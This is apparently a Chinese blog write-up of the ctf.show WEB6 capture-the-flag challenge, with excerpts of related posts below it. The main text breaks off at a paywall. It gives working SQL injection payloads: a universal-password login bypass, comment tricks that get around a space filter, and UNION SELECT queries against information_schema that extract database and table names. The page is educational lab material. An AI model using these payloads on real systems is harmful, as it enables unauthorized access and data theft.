CTF show WEB6

最新推荐文章于 2025-10-31 18:15:31 发布
原创 最新推荐文章于 2025-10-31 18:15:31 发布 · 4.1k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #web

本文介绍了一种通过SQL注入攻击获取网站敏感信息的方法。利用万能密码登录,绕过空格过滤,逐步演示如何爆破数据库名、表名、字段名及字段值,最终获取flag。
题目网站https://ctf.show
1.尝试万能密码
username=admin' or 1=1#&password=1

显示sql inject error,发现有字符被过滤。
逐个字符输入后发现过滤了空格,一般空格被过滤有如下替换方法
/**/
()
回车(url编码中的%0a)
`(tap键上面的按钮)
tap
两个空格

这里选择/**/

username=admin'/**/or/**/1=1#&password=1

成功登陆

2.使用基本的sql注入模板获取flag

爆库(web2)

username=admin'/**/union/**/select/**/1,database(),3#&password=1

爆表(flag,user)

username=admin'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#&password=1

爆字段(flag)

username=admin'/**/union/**/select/**/
最低0.47元/天 解锁文章
CTFshowweb6
世间繁华梦一出
05-07 2787
CTFshow——web6 一打开页面是用户名密码登录,我们首先第一个想到的就是sql注入了,来用万能钥匙试一哈! 报错了 然后,我在密码框里同样注入万能钥匙试了一下,发现,密码框中输入空格也会多一个黑点,于是我猜测可能是把空格过滤了,为了验证 我的猜想,来抓包看一下服务器收到的页面请求包最后传递的用户名和密码的参数值是什么样子的 抓包果然发现,空格被过滤了 一般空格被过滤有如下替换方法 /**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格 我们就选用/**/来替
Ctfshow web-web6 WP
qq_45427131的博客
05-12 585
Ctfshow web-we6 WP 进去看见一个login界面,看上去有点眼熟,好像做过,但是尝试之前做过的方法,回显始终是sql infect error,这样的回显表示输入的值中有非法字符,最后尝试下来是空格被顾虑了,用/**/代替 原来 union select 1,2,3 Web6: union/**/select/**/1,2,3 这样的话,传统艺能手工注入 判断显示位 获取当前连接的数据库 获取数据库中所有表的表名: Select table_name from informatio
ctfshow web 文件包含 78~81
最新发布
yanxi3329的博客
10-31 1033
最近了解了一点伪协议相关知识,做几个文件包含的题目试试水好了,本次wp的题目依旧取自ctfshow,为新手向,81题后面的暂时不会做,先放着好了既然关于文件包含嘛,跟伪协议当然分不开了啦,以下是我对常用伪协议(暂时只见过这些)的总结UCS-4*UCS-4BEUCS-4LE*UCS-2UCS-2BEUCS-2LEUTF-32*UTF-32BE*UTF-32LE*UTF-16*UTF-16BE*UTF-16LE*UTF-7UTF7-IMAPUTF-8*ASCII*?>]
ctfshow-萌新-web6( 利用二进制绕过获取网站敏感信息)
wangyuxiang946的博客
09-10 1万+
ctf.show萌新模块 web6关,这一关的考点是intval()函数转换字符串的特性,以及SQL注入漏洞的绕过方式,源码中过滤了单双引号,or,加减乘除号,叹号,异或,hex,select等关键字,推荐使用二进制绕过 页面中展示了部分源码,并提示我们 id=1000 时,就是flag 这里先上答案,payload如下 ?id=0b1111101000 接下来详细解释一下解题的思路,首先是利用intval()函数转换字符串的特性进行绕过 intval()函数...
ctfshow-WEB-web6
热门推荐
wangyuxiang946的博客
08-21 1万+
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过 先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输 a'or(true)# 成功登录 既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用联合注入获取当前使用的数据库,用户名输入以下payload,密码随便输 a'or(true)union(select(1),datab...
CTF.showweb6
qq_46230755的博客
01-15 535
登陆窗,先想到sql注入 抓包测试发现失败 利用/**/代替空格进行绕过 username=admin'/**/or/**/1=1#&password=123456 利用联合查询找到回显位置 username=admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#&password=123456 查数据库名 username=admin'/**/or/**/1=1/**/union/**/select/**/1,database(),3
2024年网安最新ctfshow-WEB-web6_ctf(1)
2401_84297899的博客
05-03 1341
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库是web2。
ctf.show web2
2401_88087539的博客
02-26 471
web新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
CTF show web4
qq_43039823的博客
07-22 1175
这个题长得跟web3很相似,但是实际上内容不同,得到flag的姿势也是各不相同。 打开题目界面,依旧是老样子,上边光秃秃的就一句include ....结合上题目的知识很清晰的判断出是文件包含漏洞。“PHP:include(), include_once(), require(), require_once()等 老姿势 , url=/etc/passwd 依旧能读出用户的属性,文件包含确认! 尝试着跟上一个题目的思路一样,打开burp 加上一句<?php system("ls")?&g...
ctf.show Web7
hp.puppy的博客
03-26 361
第七关也是一个SQL注入漏洞, 推荐使用联合注入, 源码中过滤了空格, 可以使用注释/**/ 或 括号() 来绕过。url地址栏中输入以下payload, 是SQL恒成立, 可以查询到所有文章内容, 由此可证明存在SQL注入。获取当前数据库, url中输入以下payload。我们也可以尝试查看user表中的字段。查看user表中username字段。查看user表中password字段。剩下的page表大家也可以自己去玩。到这里就已经可以获取 flag了。查看user表中id字段。
CTF Show Web6
qq_62566956的博客
03-28 431
在上一题的wp中,看到了工具fzbk,使用之后发现所有备份文件都返回200= =,问了问群主之后发现这是nginx服务器的设置:遇到不存在的路径就直接跳转到默认的主页面,所以导致fzbk认为所有文件都可能存在。扫到备份文件之后直接访问,在www.zip中得到。解压源码到当前目录,测试正常,收工。因为fzbk有bug,再也不用了。直接访问txt文件即可。
ctfshow-web6
aarong的博客
12-22 1742
如题又是登录框 先试试看看能不能登录 ' or 1=1# 发现出现了错误:sql inject error 用burp抓包发现,过滤了空格 空格被注释掉了,所以想办法把空格给替代掉 通过这篇文章得到注释的方法有两种,那就是注释符/* */和%a0 '/**/or/**/1=1# 发现可以登录: 接下来就是手工注入的流程了 order by 查询字段为3: username='/**/or/**/1=1/**/order/**/by/**/3#&password=123 回显的字段数
ctfshow web6
博客地址 www.sec0nd.top
02-24 528
题目分析 题目是一个登陆页面,猜测可能是sql注入类的题目 尝试一下万能密码 username=admin'/**/or/**/1=1#&password=1 发现有过滤,要找出来是过滤了哪个字符,依次输入验证,发现是过滤了空格 那么就要绕过空格,有以下几种方法 /**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格 详细见下面这篇文章https://blog.youkuaiyun.com/weixin_39945475/article/details/10990395
ROSE笔记-ctf.show_web6-WP
居上
11-06 472
ctf.show_web6 直接输入 admin' or 1=1# 显示错误,说明过滤了空格 所以用户名处把空格替换为/**/后输入 admin'/**/or/**/1=1# 开始 admin'/**/or/**/1=1/**/order/**/by/**/3# admin'/**/or/**/1=1/**/union/**/select/**/1,2,3# admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/*
CTF_ctfshow_web6
weixin_54227009的博客
05-13 587
过滤了空格 一般空格被过滤有如下替换方法 /**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格 这里选择/**/ 1'/**/union/**/select/**/1,2,3# 回显为2 查看数据库名: 1'/**/union/**/select/**/1,database(),3# 查看表名: 1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_sc
CTFshow WEB入门--web6
m0_73912575的博客
10-29 474
CTFshow WEB入门--web6
CTF show----web 解题笔记(web签到~web6
weixin_45908624的博客
11-22 5593
web签到~web6 解题笔记
[ctfshow web入门] web6 目录爆破
qq_50332504的博客
04-05 789
还记得之前说过网站的入口的吗,我们输入url/xxx,其中如果xxx存在,那么证明存在这样是个入口点。所以我们可以通过遍历url/xxx,xxx设置为变量,那么理论上就能获取网站的所有入口点。但是这是不现实的,假设每秒可以访问100次,那么我们爆破出所有xxx长度等于5的入口点需要 0-9 a-z 也就是(10+26)^5种可能 / 100(次/秒) / 60秒 / 60分钟 / 24小时 约等于 7天。所以我们需要字典。
ctf show web签到题
07-29
以下是关于CTF Show Web签到题的解题思路和方法。 ### 解题思路 1. **SQL注入** SQL注入是一种常见的Web漏洞,通过构造特殊的输入来绕过程序的验证逻辑,从而获取数据库中的敏感信息。例如,在Web签到题中,可以...
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值